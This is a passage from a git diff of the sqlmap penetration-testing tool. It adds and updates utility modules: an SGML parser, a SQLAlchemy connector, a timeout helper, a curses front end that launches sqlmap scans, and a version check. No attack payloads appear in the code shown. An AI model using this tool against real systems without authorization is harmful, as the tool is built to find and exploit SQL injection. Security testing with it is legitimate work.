+ else: + self.handle_starttag(tag, method, attrs) + return 0 + else: + self.stack.append(tag) + self.handle_starttag(tag, method, attrs) + return 1 + + # Internal -- finish processing of end tag + def finish_endtag(self, tag): + if not tag: + found = len(self.stack) - 1 + if found < 0: + self.unknown_endtag(tag) + return + else: + if tag not in self.stack: + try: + method = getattr(self, 'end_' + tag) + except AttributeError: + self.unknown_endtag(tag) + else: + self.report_unbalanced(tag) + return + found = len(self.stack) + for i in range(found): + if self.stack[i] == tag: + found = i + while len(self.stack) > found: + tag = self.stack[-1] + try: + method = getattr(self, 'end_' + tag) + except AttributeError: + method = None + if method: + self.handle_endtag(tag, method) + else: + self.unknown_endtag(tag) + del self.stack[-1] + + # Overridable -- handle start tag + def handle_starttag(self, tag, method, attrs): + method(attrs) + + # Overridable -- handle end tag + def handle_endtag(self, tag, method): + method() + + # Example -- report an unbalanced </...> tag. + def report_unbalanced(self, tag): + if self.verbose: + print('*** Unbalanced </' + tag + '>') + print('*** Stack:', self.stack) + + def convert_charref(self, name): + """Convert character reference, may be overridden.""" + try: + n = int(name) + except ValueError: + return + if not 0 <= n <= 127: + return + return self.convert_codepoint(n) + + def convert_codepoint(self, codepoint): + return chr(codepoint) + + def handle_charref(self, name): + """Handle character reference, no need to override.""" + replacement = self.convert_charref(name) + if replacement is None: + self.unknown_charref(name) + else: + self.handle_data(replacement) + + # Definition of entities -- derived classes may override + entitydefs = \ + {'lt': '<', 'gt': '>', 'amp': '&', 'quot': '"', 'apos': '\''} + + def convert_entityref(self, name): + """Convert entity references. + + As an alternative to overriding this method; one can tailor the + results by setting up the self.entitydefs mapping appropriately. + """ + table = self.entitydefs + if name in table: + return table[name] + else: + return + + def handle_entityref(self, name): + """Handle entity references, no need to override.""" + replacement = self.convert_entityref(name) + if replacement is None: + self.unknown_entityref(name) + else: + self.handle_data(replacement) + + # Example -- handle data, should be overridden + def handle_data(self, data): + pass + + # Example -- handle comment, could be overridden + def handle_comment(self, data): + pass + + # Example -- handle declaration, could be overridden + def handle_decl(self, decl): + pass + + # Example -- handle processing instruction, could be overridden + def handle_pi(self, data): + pass + + # To be overridden -- handlers for unknown objects + def unknown_starttag(self, tag, attrs): + pass + + def unknown_endtag(self, tag): + pass + + def unknown_charref(self, ref): + pass + + def unknown_entityref(self, ref): + pass + + +class TestSGMLParser(SGMLParser): + + def __init__(self, verbose=0): + self.testdata = "" + SGMLParser.__init__(self, verbose) + + def handle_data(self, data): + self.testdata = self.testdata + data + if len(repr(self.testdata)) >= 70: + self.flush() + + def flush(self): + data = self.testdata + if data: + self.testdata = "" + print('data:', repr(data)) + + def handle_comment(self, data): + self.flush() + r = repr(data) + if len(r) > 68: + r = r[:32] + '...' + r[-32:] + print('comment:', r) + + def unknown_starttag(self, tag, attrs): + self.flush() + if not attrs: + print('start tag: <' + tag + '>') + else: + print('start tag: <' + tag, end=' ') + for name, value in attrs: + print(name + '=' + '"' + value + '"', end=' ') + print('>') + + def unknown_endtag(self, tag): + self.flush() + print('end tag: </' + tag + '>') + + def unknown_entityref(self, ref): + self.flush() + print('*** unknown entity ref: &' + ref + ';') + + def unknown_charref(self, ref): + self.flush() + print('*** unknown char ref: &#' + ref + ';') + + def unknown_decl(self, data): + self.flush() + print('*** unknown decl: [' + data + ']') + + def close(self): + SGMLParser.close(self) + self.flush() + + +def test(args=None): + import sys + + if args is None: + args = sys.argv[1:] + + if args and args[0] == '-s': + args = args[1:] + klass = SGMLParser + else: + klass = TestSGMLParser + + if args: + file = args[0] + else: + file = 'test.html' + + if file == '-': + f = sys.stdin + else: + try: + f = open(file, 'r') + except IOError as msg: + print(file, ":", msg) + sys.exit(1) + + data = f.read() + if f is not sys.stdin: + f.close() + + x = klass() + for c in data: + x.feed(c) + x.close() + + +if __name__ == '__main__': + test() diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py new file mode 100644 index 00000000000..7506b42a79f --- /dev/null +++ b/lib/utils/sqlalchemy.py @@ -0,0 +1,139 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import importlib +import logging +import os +import re +import sys +import traceback +import warnings + +_path = list(sys.path) +_sqlalchemy = None +try: + sys.path = sys.path[1:] + module = importlib.import_module("sqlalchemy") + if hasattr(module, "dialects"): + _sqlalchemy = module + warnings.simplefilter(action="ignore", category=_sqlalchemy.exc.SAWarning) +except: + pass +finally: + sys.path = _path + +try: + import MySQLdb # used by SQLAlchemy in case of MySQL + warnings.filterwarnings("error", category=MySQLdb.Warning) +except (ImportError, AttributeError): + pass + +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapMissingDependence +from plugins.generic.connector import Connector as GenericConnector +from thirdparty import six +from thirdparty.six.moves import urllib as _urllib + +def getSafeExString(ex, encoding=None): # Cross-referenced function + raise NotImplementedError + +class SQLAlchemy(GenericConnector): + def __init__(self, dialect=None): + GenericConnector.__init__(self) + + self.dialect = dialect + self.address = conf.direct + + if conf.dbmsUser: + self.address = self.address.replace("'%s':" % conf.dbmsUser, "%s:" % _urllib.parse.quote(conf.dbmsUser)) + self.address = self.address.replace("%s:" % conf.dbmsUser, "%s:" % _urllib.parse.quote(conf.dbmsUser)) + + if conf.dbmsPass: + self.address = self.address.replace(":'%s'@" % conf.dbmsPass, ":%s@" % _urllib.parse.quote(conf.dbmsPass)) + self.address = self.address.replace(":%s@" % conf.dbmsPass, ":%s@" % _urllib.parse.quote(conf.dbmsPass)) + + if self.dialect: + self.address = re.sub(r"\A.+://", "%s://" % self.dialect, self.address) + + def connect(self): + if _sqlalchemy: + self.initConnection() + + try: + if not self.port and self.db: + if not os.path.exists(self.db): + raise SqlmapFilePathException("the provided database file '%s' does not exist" % self.db) + + _ = self.address.split("//", 1) + self.address = "%s////%s" % (_[0], os.path.abspath(self.db)) + + if self.dialect == "sqlite": + engine = _sqlalchemy.create_engine(self.address, connect_args={"check_same_thread": False}) + elif self.dialect == "oracle": + engine = _sqlalchemy.create_engine(self.address) + else: + engine = _sqlalchemy.create_engine(self.address, connect_args={}) + + self.connector = engine.connect() + except (TypeError, ValueError): + if "_get_server_version_info" in traceback.format_exc(): + try: + import pymssql + if int(pymssql.__version__[0]) < 2: + raise SqlmapConnectionException("SQLAlchemy connection issue (obsolete version of pymssql ('%s') is causing problems)" % pymssql.__version__) + except ImportError: + pass + elif "invalid literal for int() with base 10: '0b" in traceback.format_exc(): + raise SqlmapConnectionException("SQLAlchemy connection issue ('https://bitbucket.org/zzzeek/sqlalchemy/issues/3975')") + else: + pass + except SqlmapFilePathException: + raise + except Exception as ex: + raise SqlmapConnectionException("SQLAlchemy connection issue ('%s')" % getSafeExString(ex)) + + self.printConnected() + else: + raise SqlmapMissingDependence("SQLAlchemy not available (e.g. 'pip%s install SQLAlchemy')" % ('3' if six.PY3 else "")) + + def fetchall(self): + try: + retVal = [] + for row in self.cursor.fetchall(): + retVal.append(tuple(row)) + return retVal + except _sqlalchemy.exc.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + # Reference: https://stackoverflow.com/a/69491015 + if hasattr(_sqlalchemy, "text"): + query = _sqlalchemy.text(query) + + try: + self.cursor = self.connector.execute(query) + retVal = True + except (_sqlalchemy.exc.OperationalError, _sqlalchemy.exc.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except _sqlalchemy.exc.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + return retVal + + def select(self, query): + retVal = None + + if self.execute(query): + retVal = self.fetchall() + + return retVal diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py index 5d41708f387..0b252547e00 100644 --- a/lib/utils/timeout.py +++ b/lib/utils/timeout.py @@ -1,33 +1,37 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import threading from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import TIMEOUT_STATE -def timeout(func, args=(), kwargs={}, duration=1, default=None): +def timeout(func, args=None, kwargs=None, duration=1, default=None): class InterruptableThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) self.result = None + self.timeout_state = None def run(self): try: - self.result = func(*args, **kwargs) - except Exception, msg: - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, msg) + self.result = func(*(args or ()), **(kwargs or {})) + self.timeout_state = TIMEOUT_STATE.NORMAL + except Exception as ex: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, ex) self.result = default + self.timeout_state = TIMEOUT_STATE.EXCEPTION thread = InterruptableThread() thread.start() thread.join(duration) - if thread.isAlive(): - return default + if thread.is_alive(): + return default, TIMEOUT_STATE.TIMEOUT else: - return thread.result + return thread.result, thread.timeout_state diff --git a/lib/utils/tui.py b/lib/utils/tui.py new file mode 100644 index 00000000000..d785e5f7673 --- /dev/null +++ b/lib/utils/tui.py @@ -0,0 +1,768 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import subprocess +import sys +import tempfile + +try: + import curses +except ImportError: + curses = None + +from lib.core.common import getSafeExString +from lib.core.common import saveConfig +from lib.core.data import paths +from lib.core.defaults import defaults +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapMissingDependence +from lib.core.exception import SqlmapSystemException +from lib.core.settings import IS_WIN +from thirdparty.six.moves import configparser as _configparser + +class NcursesUI: + def __init__(self, stdscr, parser): + self.stdscr = stdscr + self.parser = parser + self.current_tab = 0 + self.current_field = 0 + self.scroll_offset = 0 + self.tabs = [] + self.fields = {} + self.running = False + self.process = None + + # Initialize colors + curses.start_color() + curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_CYAN) # Header + curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_BLUE) # Active tab + curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE) # Inactive tab + curses.init_pair(4, curses.COLOR_YELLOW, curses.COLOR_BLACK) # Selected field + curses.init_pair(5, curses.COLOR_GREEN, curses.COLOR_BLACK) # Help text + curses.init_pair(6, curses.COLOR_RED, curses.COLOR_BLACK) # Error/Important + curses.init_pair(7, curses.COLOR_CYAN, curses.COLOR_BLACK) # Label + + # Setup curses + curses.curs_set(1) + self.stdscr.keypad(1) + + # Parse option groups + self._parse_options() + + def _parse_options(self): + """Parse command line options into tabs and fields""" + for group in self.parser.option_groups: + tab_data = { + 'title': group.title, + 'description': group.get_description() if hasattr(group, 'get_description') and group.get_description() else "", + 'options': [] + } + + for option in group.option_list: + field_data = { + 'dest': option.dest, + 'label': self._format_option_strings(option), + 'help': option.help if option.help else "", + 'type': option.type if hasattr(option, 'type') and option.type else 'bool', + 'value': '', + 'default': defaults.get(option.dest) if defaults.get(option.dest) else None + } + tab_data['options'].append(field_data) + self.fields[(group.title, option.dest)] = field_data + + self.tabs.append(tab_data) + + def _format_option_strings(self, option): + """Format option strings for display""" + parts = [] + if hasattr(option, '_short_opts') and option._short_opts: + parts.extend(option._short_opts) + if hasattr(option, '_long_opts') and option._long_opts: + parts.extend(option._long_opts) + return ', '.join(parts) + + def _draw_header(self): + """Draw the header bar""" + height, width = self.stdscr.getmaxyx() + header = " sqlmap - ncurses TUI " + self.stdscr.attron(curses.color_pair(1) | curses.A_BOLD) + self.stdscr.addstr(0, 0, header.center(width)) + self.stdscr.attroff(curses.color_pair(1) | curses.A_BOLD) + + def _get_tab_bar_height(self): + """Calculate how many rows the tab bar uses""" + height, width = self.stdscr.getmaxyx() + y = 1 + x = 0 + + for i, tab in enumerate(self.tabs): + tab_text = " %s " % tab['title'] + + # Check if tab exceeds width, wrap to next line + if x + len(tab_text) >= width: + y += 1 + x = 0 + # Stop if we've used too many lines + if y >= 3: + break + + x += len(tab_text) + 1 + + return y + + def _draw_tabs(self): + """Draw the tab bar""" + height, width = self.stdscr.getmaxyx() + y = 1 + x = 0 + + for i, tab in enumerate(self.tabs): + tab_text = " %s " % tab['title'] + + # Check if tab exceeds width, wrap to next line + if x + len(tab_text) >= width: + y += 1 + x = 0 + # Stop if we've used too many lines + if y >= 3: + break + + if i == self.current_tab: + self.stdscr.attron(curses.color_pair(2) | curses.A_BOLD) + else: + self.stdscr.attron(curses.color_pair(3)) + + try: + self.stdscr.addstr(y, x, tab_text) + except: + pass + + if i == self.current_tab: + self.stdscr.attroff(curses.color_pair(2) | curses.A_BOLD) + else: + self.stdscr.attroff(curses.color_pair(3)) + + x += len(tab_text) + 1 + + def _draw_footer(self): + """Draw the footer with help text""" + height, width = self.stdscr.getmaxyx() + footer = " [Tab] Next | [Arrows] Navigate | [Enter] Edit | [F2] Run | [F3] Export | [F4] Import | [F10] Quit " + + try: + self.stdscr.attron(curses.color_pair(1)) + self.stdscr.addstr(height - 1, 0, footer.ljust(width)) + self.stdscr.attroff(curses.color_pair(1)) + except: + pass + + def _draw_current_tab(self): + """Draw the current tab content""" + height, width = self.stdscr.getmaxyx() + tab = self.tabs[self.current_tab] + + # Calculate tab bar height + tab_bar_height = self._get_tab_bar_height() + start_y = tab_bar_height + 1 + + # Clear content area + for y in range(start_y, height - 1): + try: + self.stdscr.addstr(y, 0, " " * width) + except: + pass + + y = start_y + + # Draw description if exists + if tab['description']: + desc_lines = self._wrap_text(tab['description'], width - 4) + for line in desc_lines[:2]: # Limit to 2 lines + try: + self.stdscr.attron(curses.color_pair(5)) + self.stdscr.addstr(y, 2, line) + self.stdscr.attroff(curses.color_pair(5)) + y += 1 + except: + pass + y += 1 + + # Draw options + visible_start = self.scroll_offset + visible_end = visible_start + (height - y - 2) + + for i, option in enumerate(tab['options'][visible_start:visible_end], visible_start): + if y >= height - 2: + break + + is_selected = (i == self.current_field) + + # Draw label + label = option['label'][:25].ljust(25) + try: + if is_selected: + self.stdscr.attron(curses.color_pair(4) | curses.A_BOLD) + else: + self.stdscr.attron(curses.color_pair(7)) + + self.stdscr.addstr(y, 2, label) + + if is_selected: + self.stdscr.attroff(curses.color_pair(4) | curses.A_BOLD) + else: + self.stdscr.attroff(curses.color_pair(7)) + except: + pass + + # Draw value + value_str = "" + if option['type'] == 'bool': + value = option['value'] if option['value'] is not None else option.get('default') + value_str = "[X]" if value else "[ ]" + else: + value_str = str(option['value']) if option['value'] else "" + if option['default'] and not option['value']: + value_str = "(%s)" % str(option['default']) + + value_str = value_str[:30] + + try: + if is_selected: + self.stdscr.attron(curses.color_pair(4) | curses.A_BOLD) + self.stdscr.addstr(y, 28, value_str) + if is_selected: + self.stdscr.attroff(curses.color_pair(4) | curses.A_BOLD) + except: + pass + + # Draw help text + if width > 65: + help_text = option['help'][:width-62] if option['help'] else "" + try: + self.stdscr.attron(curses.color_pair(5)) + self.stdscr.addstr(y, 60, help_text) + self.stdscr.attroff(curses.color_pair(5)) + except: + pass + + y += 1 + + # Draw scroll indicator + if len(tab['options']) > visible_end - visible_start: + try: + self.stdscr.attron(curses.color_pair(6)) + self.stdscr.addstr(height - 2, width - 10, "[More...]") + self.stdscr.attroff(curses.color_pair(6)) + except: + pass + + def _wrap_text(self, text, width): + """Wrap text to fit within width""" + words = text.split() + lines = [] + current_line = "" + + for word in words: + if len(current_line) + len(word) + 1 <= width: + current_line += word + " " + else: + if current_line: + lines.append(current_line.strip()) + current_line = word + " " + + if current_line: + lines.append(current_line.strip()) + + return lines + + def _edit_field(self): + """Edit the current field""" + tab = self.tabs[self.current_tab] + if self.current_field >= len(tab['options']): + return + + option = tab['options'][self.current_field] + + if option['type'] == 'bool': + # Toggle boolean + option['value'] = not option['value'] + else: + # Text input + height, width = self.stdscr.getmaxyx() + + # Create input window + input_win = curses.newwin(5, width - 20, height // 2 - 2, 10) + input_win.box() + input_win.attron(curses.color_pair(2)) + input_win.addstr(0, 2, " Edit %s " % option['label'][:20]) + input_win.attroff(curses.color_pair(2)) + input_win.addstr(2, 2, "Value:") + input_win.refresh() + + # Get input + curses.echo() + curses.curs_set(1) + + # Pre-fill with existing value + current_value = str(option['value']) if option['value'] else "" + input_win.addstr(2, 9, current_value) + input_win.move(2, 9) + + try: + new_value = input_win.getstr(2, 9, width - 32).decode('utf-8') + + # Validate and convert based on type + if option['type'] == 'int': + try: + option['value'] = int(new_value) if new_value else None + except ValueError: + option['value'] = None + elif option['type'] == 'float': + try: + option['value'] = float(new_value) if new_value else None + except ValueError: + option['value'] = None + else: + option['value'] = new_value if new_value else None + except: + pass + + curses.noecho() + curses.curs_set(0) + + # Clear input window + input_win.clear() + input_win.refresh() + del input_win + + def _export_config(self): + """Export current configuration to a file""" + height, width = self.stdscr.getmaxyx() + + # Create input window + input_win = curses.newwin(5, width - 20, height // 2 - 2, 10) + input_win.box() + input_win.attron(curses.color_pair(2)) + input_win.addstr(0, 2, " Export Configuration ") + input_win.attroff(curses.color_pair(2)) + input_win.addstr(2, 2, "File:") + input_win.refresh() + + # Get input + curses.echo() + curses.curs_set(1) + + try: + filename = input_win.getstr(2, 8, width - 32).decode('utf-8').strip() + + if filename: + # Collect all field values + config = {} + for tab in self.tabs: + for option in tab['options']: + dest = option['dest'] + value = option['value'] if option['value'] is not None else option.get('default') + + if option['type'] == 'bool': + config[dest] = bool(value) + elif option['type'] == 'int': + config[dest] = int(value) if value else None + elif option['type'] == 'float': + config[dest] = float(value) if value else None + else: + config[dest] = value + + # Set defaults for unset options + for option in self.parser.option_list: + if option.dest not in config or config[option.dest] is None: + config[option.dest] = defaults.get(option.dest, None) + + # Save config + try: + saveConfig(config, filename) + + # Show success message + input_win.clear() + input_win.box() + input_win.attron(curses.color_pair(5)) + input_win.addstr(0, 2, " Export Successful ") + input_win.attroff(curses.color_pair(5)) + input_win.addstr(2, 2, "Configuration exported to:") + input_win.addstr(3, 2, filename[:width - 26]) + input_win.refresh() + curses.napms(2000) + except Exception as ex: + # Show error message + input_win.clear() + input_win.box() + input_win.attron(curses.color_pair(6)) + input_win.addstr(0, 2, " Export Failed ") + input_win.attroff(curses.color_pair(6)) + input_win.addstr(2, 2, str(getSafeExString(ex))[:width - 26]) + input_win.refresh() + curses.napms(2000) + except: + pass + + curses.noecho() + curses.curs_set(0) + + # Clear input window + input_win.clear() + input_win.refresh() + del input_win + + def _import_config(self): + """Import configuration from a file""" + height, width = self.stdscr.getmaxyx() + + # Create input window + input_win = curses.newwin(5, width - 20, height // 2 - 2, 10) + input_win.box() + input_win.attron(curses.color_pair(2)) + input_win.addstr(0, 2, " Import Configuration ") + input_win.attroff(curses.color_pair(2)) + input_win.addstr(2, 2, "File:") + input_win.refresh() + + # Get input + curses.echo() + curses.curs_set(1) + + try: + filename = input_win.getstr(2, 8, width - 32).decode('utf-8').strip() + + if filename and os.path.isfile(filename): + try: + # Read config file + config = _configparser.ConfigParser() + config.read(filename) + + imported_count = 0 + + # Load values into fields + for tab in self.tabs: + for option in tab['options']: + dest = option['dest'] + + # Search for option in all sections + for section in config.sections(): + if config.has_option(section, dest): + value = config.get(section, dest) + + # Convert based on type + if option['type'] == 'bool': + option['value'] = value.lower() in ('true', '1', 'yes', 'on') + elif option['type'] == 'int': + try: + option['value'] = int(value) if value else None + except ValueError: + option['value'] = None + elif option['type'] == 'float': + try: + option['value'] = float(value) if value else None + except ValueError: + option['value'] = None + else: + option['value'] = value if value else None + + imported_count += 1 + break + + # Show success message + input_win.clear() + input_win.box() + input_win.attron(curses.color_pair(5)) + input_win.addstr(0, 2, " Import Successful ") + input_win.attroff(curses.color_pair(5)) + input_win.addstr(2, 2, "Imported %d options from:" % imported_count) + input_win.addstr(3, 2, filename[:width - 26]) + input_win.refresh() + curses.napms(2000) + + except Exception as ex: + # Show error message + input_win.clear() + input_win.box() + input_win.attron(curses.color_pair(6)) + input_win.addstr(0, 2, " Import Failed ") + input_win.attroff(curses.color_pair(6)) + input_win.addstr(2, 2, str(getSafeExString(ex))[:width - 26]) + input_win.refresh() + curses.napms(2000) + elif filename: + # File not found + input_win.clear() + input_win.box() + input_win.attron(curses.color_pair(6)) + input_win.addstr(0, 2, " File Not Found ") + input_win.attroff(curses.color_pair(6)) + input_win.addstr(2, 2, "File does not exist:") + input_win.addstr(3, 2, filename[:width - 26]) + input_win.refresh() + curses.napms(2000) + except: + pass + + curses.noecho() + curses.curs_set(0) + + # Clear input window + input_win.clear() + input_win.refresh() + del input_win + + def _run_sqlmap(self): + """Run sqlmap with current configuration""" + config = {} + + # Collect all field values + for tab in self.tabs: + for option in tab['options']: + dest = option['dest'] + value = option['value'] if option['value'] is not None else option.get('default') + + if option['type'] == 'bool': + config[dest] = bool(value) + elif option['type'] == 'int': + config[dest] = int(value) if value else None + elif option['type'] == 'float': + config[dest] = float(value) if value else None + else: + config[dest] = value + + # Set defaults for unset options + for option in self.parser.option_list: + if option.dest not in config or config[option.dest] is None: + config[option.dest] = defaults.get(option.dest, None) + + # Create temp config file + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + + saveConfig(config, configFile) + + # Show console + self._show_console(configFile) + + def _show_console(self, configFile): + """Show console output from sqlmap""" + height, width = self.stdscr.getmaxyx() + + # Create console window + console_win = curses.newwin(height - 4, width - 4, 2, 2) + console_win.box() + console_win.attron(curses.color_pair(2)) + console_win.addstr(0, 2, " sqlmap Console - Press Q to close ") + console_win.attroff(curses.color_pair(2)) + console_win.refresh() + + # Create output area + output_win = console_win.derwin(height - 8, width - 8, 2, 2) + output_win.scrollok(True) + output_win.idlok(True) + + # Start sqlmap process + try: + process = subprocess.Popen( + [sys.executable or "python", os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap.py"), "-c", configFile], + shell=False, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + stdin=subprocess.PIPE, + bufsize=1, + close_fds=not IS_WIN + ) + + if not IS_WIN: + # Make it non-blocking + import fcntl + flags = fcntl.fcntl(process.stdout, fcntl.F_GETFL) + fcntl.fcntl(process.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK) + + output_win.nodelay(True) + console_win.nodelay(True) + + lines = [] + current_line = "" + + while True: + # Check for user input + try: + key = console_win.getch() + if key in (ord('q'), ord('Q')): + # Kill process + process.terminate() + break + elif key == curses.KEY_ENTER or key == 10: + # Send newline to process + if process.poll() is None: + try: + process.stdin.write(b'\n') + process.stdin.flush() + except: + pass + except: + pass + + # Read output + try: + chunk = process.stdout.read(1024) + if chunk: + current_line += chunk.decode('utf-8', errors='ignore') + + # Split into lines + while '\n' in current_line: + line, current_line = current_line.split('\n', 1) + lines.append(line) + + # Keep only last N lines + if len(lines) > 1000: + lines = lines[-1000:] + + # Display lines + output_win.clear() + start_line = max(0, len(lines) - (height - 10)) + for i, l in enumerate(lines[start_line:]): + try: + output_win.addstr(i, 0, l[:width-10]) + except: + pass + output_win.refresh() + console_win.refresh() + except: + pass + + # Check if process ended + if process.poll() is not None: + # Read remaining output + try: + remaining = process.stdout.read() + if remaining: + current_line += remaining.decode('utf-8', errors='ignore') + for line in current_line.split('\n'): + if line: + lines.append(line) + except: + pass + + # Display final output + output_win.clear() + start_line = max(0, len(lines) - (height - 10)) + for i, l in enumerate(lines[start_line:]): + try: + output_win.addstr(i, 0, l[:width-10]) + except: + pass + + output_win.addstr(height - 9, 0, "--- Process finished. Press Q to close ---") + output_win.refresh() + console_win.refresh() + + # Wait for Q + console_win.nodelay(False) + while True: + key = console_win.getch() + if key in (ord('q'), ord('Q')): + break + + break + + # Small delay + curses.napms(50) + + except Exception as ex: + output_win.addstr(0, 0, "Error: %s" % getSafeExString(ex)) + output_win.refresh() + console_win.nodelay(False) + console_win.getch() + + finally: + # Clean up + try: + os.unlink(configFile) + except: + pass + + console_win.nodelay(False) + output_win.nodelay(False) + del output_win + del console_win + + def run(self): + """Main UI loop""" + while True: + self.stdscr.clear() + + # Draw UI + self._draw_header() + self._draw_tabs() + self._draw_current_tab() + self._draw_footer() + + self.stdscr.refresh() + + # Get input + key = self.stdscr.getch() + + tab = self.tabs[self.current_tab] + + # Handle input + if key == curses.KEY_F10 or key == 27: # F10 or ESC + break + elif key == ord('\t') or key == curses.KEY_RIGHT: # Tab or Right arrow + self.current_tab = (self.current_tab + 1) % len(self.tabs) + self.current_field = 0 + self.scroll_offset = 0 + elif key == curses.KEY_LEFT: # Left arrow + self.current_tab = (self.current_tab - 1) % len(self.tabs) + self.current_field = 0 + self.scroll_offset = 0 + elif key == curses.KEY_UP: # Up arrow + if self.current_field > 0: + self.current_field -= 1 + # Adjust scroll if needed + if self.current_field < self.scroll_offset: + self.scroll_offset = self.current_field + elif key == curses.KEY_DOWN: # Down arrow + if self.current_field < len(tab['options']) - 1: + self.current_field += 1 + # Adjust scroll if needed + height, width = self.stdscr.getmaxyx() + visible_lines = height - 8 + if self.current_field >= self.scroll_offset + visible_lines: + self.scroll_offset = self.current_field - visible_lines + 1 + elif key == curses.KEY_ENTER or key == 10 or key == 13: # Enter + self._edit_field() + elif key == curses.KEY_F2: # F2 to run + self._run_sqlmap() + elif key == curses.KEY_F3: # F3 to export + self._export_config() + elif key == curses.KEY_F4: # F4 to import + self._import_config() + elif key == ord(' '): # Space for boolean toggle + option = tab['options'][self.current_field] + if option['type'] == 'bool': + option['value'] = not option['value'] + +def runTui(parser): + """Main entry point for ncurses TUI""" + # Check if ncurses is available + if curses is None: + raise SqlmapMissingDependence("missing 'curses' module (optional Python module). Use a Python build that includes curses/ncurses, or install the platform-provided equivalent (e.g. for Windows: pip install windows-curses)") + try: + # Initialize and run + def main(stdscr): + ui = NcursesUI(stdscr, parser) + ui.run() + + curses.wrapper(main) + + except Exception as ex: + errMsg = "unable to create ncurses UI ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py new file mode 100644 index 00000000000..d54a313aca3 --- /dev/null +++ b/lib/utils/versioncheck.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import sys +import time + +PYVERSION = sys.version.split()[0] + +if PYVERSION < "2.7": + sys.exit("[%s] [CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.7 or 3.x (visit 'https://www.python.org/downloads/')" % (time.strftime("%X"), PYVERSION)) + +errors = [] +extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib") +for _ in extensions: + try: + __import__(_) + except ImportError: + errors.append(_) + +if errors: + errMsg = "[%s] [CRITICAL] missing one or more core extensions (%s) " % (time.strftime("%X"), ", ".join("'%s'" % _ for _ in errors)) + errMsg += "most likely because current version of Python has been " + errMsg += "built without appropriate dev packages" + sys.exit(errMsg) diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py index 80a2ab61e9a..1a911b567e3 100644 --- a/lib/utils/xrange.py +++ b/lib/utils/xrange.py @@ -1,14 +1,38 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import numbers + class xrange(object): """ Advanced (re)implementation of xrange (supports slice/copy/etc.) Reference: http://code.activestate.com/recipes/521885-a-pythonic-implementation-of-xrange/ + + >>> list(xrange(1, 9)) == list(range(1, 9)) + True + >>> list(xrange(8, 0, -16)) == list(range(8, 0, -16)) + True + >>> list(xrange(0, 8, 16)) == list(range(0, 8, 16)) + True + >>> list(xrange(0, 4, 5)) == list(range(0, 4, 5)) + True + >>> list(xrange(4, 0, 3)) == list(range(4, 0, 3)) + True + >>> list(xrange(0, -3)) == list(range(0, -3)) + True + >>> list(xrange(0, 7, 2)) == list(range(0, 7, 2)) + True + >>> foobar = xrange(1, 10) + >>> 7 in foobar + True + >>> 11 in foobar + False + >>> foobar[0] + 1 """ __slots__ = ['_slice'] @@ -20,7 +44,7 @@ def __init__(self, *args): self._slice = slice(*args) if self._slice.stop is None: raise TypeError("xrange stop must not be None") - + @property def start(self): if self._slice.start is not None: @@ -40,37 +64,41 @@ def step(self): def __hash__(self): return hash(self._slice) - def __cmp__(self, other): - return (cmp(type(self), type(other)) or - cmp(self._slice, other._slice)) - def __repr__(self): - return '%s(%r, %r, %r)' % (type(self).__name__, - self.start, self.stop, self.step) + return '%s(%r, %r, %r)' % (type(self).__name__, self.start, self.stop, self.step) def __len__(self): return self._len() def _len(self): - return max(0, int((self.stop - self.start) / self.step)) + return max(0, 1 + int((self.stop - 1 - self.start) // self.step)) + + def __contains__(self, value): + return (self.start <= value < self.stop) and (value - self.start) % self.step == 0 def __getitem__(self, index): if isinstance(index, slice): start, stop, step = index.indices(self._len()) return xrange(self._index(start), - self._index(stop), step*self.step) - elif isinstance(index, (int, long)): + self._index(stop), step * self.step) + elif isinstance(index, numbers.Integral): if index < 0: fixed_index = index + self._len() else: fixed_index = index - + if not 0 <= fixed_index < self._len(): raise IndexError("Index %d out of %r" % (index, self)) - + return self._index(fixed_index) else: raise TypeError("xrange indices must be slices or integers") def _index(self, i): return self.start + self.step * i + + def index(self, i): + if self.start <= i < self.stop: + return i - self.start + else: + raise ValueError("%d is not in list" % i) diff --git a/plugins/__init__.py b/plugins/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/plugins/__init__.py +++ 